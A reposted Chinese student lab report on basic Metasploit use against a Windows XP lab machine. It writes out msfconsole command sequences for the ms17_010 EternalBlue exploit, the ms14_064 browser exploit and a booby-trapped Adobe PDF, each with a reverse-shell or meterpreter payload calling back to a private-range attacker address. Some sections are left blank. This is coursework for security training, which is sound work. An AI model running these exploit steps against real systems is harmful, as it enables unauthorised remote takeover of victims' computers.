码迷,mamicode.com
首页 > 其他好文 > 详细

2019-2020-2 20175234 赵诗玥 《网络对抗技术》Exp6 MSF基础应用

时间:2020-04-27 23:00:36      阅读:135      评论:0      收藏:0      [点我收藏+]

标签:layer   div   参数   ado   好的   客户   sha   检测   设置   

实验内容

  • 一个主动攻击实践,如ms08_067
  • 一个针对浏览器的攻击,如ms11_050
  • 一个针对客户端的攻击,如Adobe
  • 成功应用任何一个辅助模块

基础问题回答

  • 用自己的话解释什么是exploit,payload,encode
  • 答:
    encode:编码格式
    技术图片

实践总结与体会

离实战还缺些什么技术或步骤?

实践过程记录

一个主动攻击实践:ms17_010

  • cd /usr/share/metasploit-framework/modules/exploits/里找点想尝试的漏洞,比如ms17_010(我在尝试调试我的终端的颜色,有点丑,后面又改回去了)
    技术图片

  • 再确定攻击的靶机为自己想攻击的后,利用辅助模块的scanner检测是否符合漏洞条件

    • use auxiliary/scanner/smb/smb_ms17_010
    • show options查看需要填写的参数,然后设置那些参数
    • run就好啦
      技术图片
  • 那攻击一下试试

    • use exploit/windows/smb/ms17_010_eternalblue
    • set payload generic/shell_reverse_tcp 选择攻击载荷
    • show options
    • 自己填写一下参数
    • exploit
      技术图片
      -可以尝试使用windows命令行瞅瞅,嗯,充分的展示了我的中文乱码
      技术图片

针对浏览器的攻击:ms14_064

  • 攻击一下试试
    • use exploit/windows/browser/ms14_064_ole_code_execution
    • set payload windows/meterpreter/reverse_tcp
    • set SRVHOST 192.168.121.128 不要傻了吧唧的改了SRVPORT ,尤其是跟LPORT一样,当然好奇的的话可以试试
    • set LHOST 192.168.121.128都是攻击机哒
    • set LPORT 5234
    • exploit
  • Windows端打开生成的URL,就可以看到一个session 1啦
    技术图片
  • 然后我们Ctrl C一下,再输入sessions -i 1就可以接管我们的XP机器啦
    技术图片

针对客户端的攻击:adobe_toolbutton

  • 攻击一下试试
    • use exploit/windows/fileformat/adobe_toolbutton
    • set payload windows/meterpreter/reverse_tcp
    • show options,然后自己填一下吧
      技术图片
  • 把生成的5234msf.pdf拖到靶机
  • 打开kali端监听模块
    • use exploit/multi/handler
    • set payload windows/meterpreter/reverse_tcp
    • show options,然后自己配置一下吧
    • exploit
  • Windows端打开5234msf.pdf文件
    技术图片

再来个针对客户端的攻击:Xenorate

  • 找个针对靶机XP的攻击模块:search Xenorate
  • use exploit/windows/fileformat/vuplayer_cue,info再确认一下
    技术图片
  • set payload windows/meterpreter/reverse_tcp
  • show options,再自己手动填写一下
    技术图片
  • exploit
    技术图片
    好的,成功看到一个报错Exploit failed: No encoders encoded the buffer successfully
    查了一下资料,普遍是说,说明rb文件书写语法有误,需要更改,不同的版本有可能语法也不完全相同?

应用一个辅助模块

实验资料参考

END

2019-2020-2 20175234 赵诗玥 《网络对抗技术》Exp6 MSF基础应用

标签:layer   div   参数   ado   好的   客户   sha   检测   设置   

原文地址:https://www.cnblogs.com/ysz-123/p/12774369.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!